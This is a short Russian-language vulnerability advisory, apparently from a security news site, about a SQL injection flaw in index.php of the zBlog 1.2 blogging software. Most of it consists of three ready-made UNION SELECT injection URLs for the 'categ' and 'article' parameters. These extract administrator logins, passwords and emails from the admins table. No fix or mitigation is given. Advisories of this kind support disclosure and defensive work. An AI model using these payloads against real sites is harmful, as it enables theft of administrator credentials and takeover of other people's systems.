Хакер #305. Многошаговые SQL-инъекции
Программа: zBlog 1.2
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201, pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16, email_admin%20from%20[table prefix]_admins--
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201, pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13, 14,15,16,17,email_admin%20from%20[table prefix]_admins--
http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201, pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13, 14,15,16,17,email_admin%20from%20zblog_admins--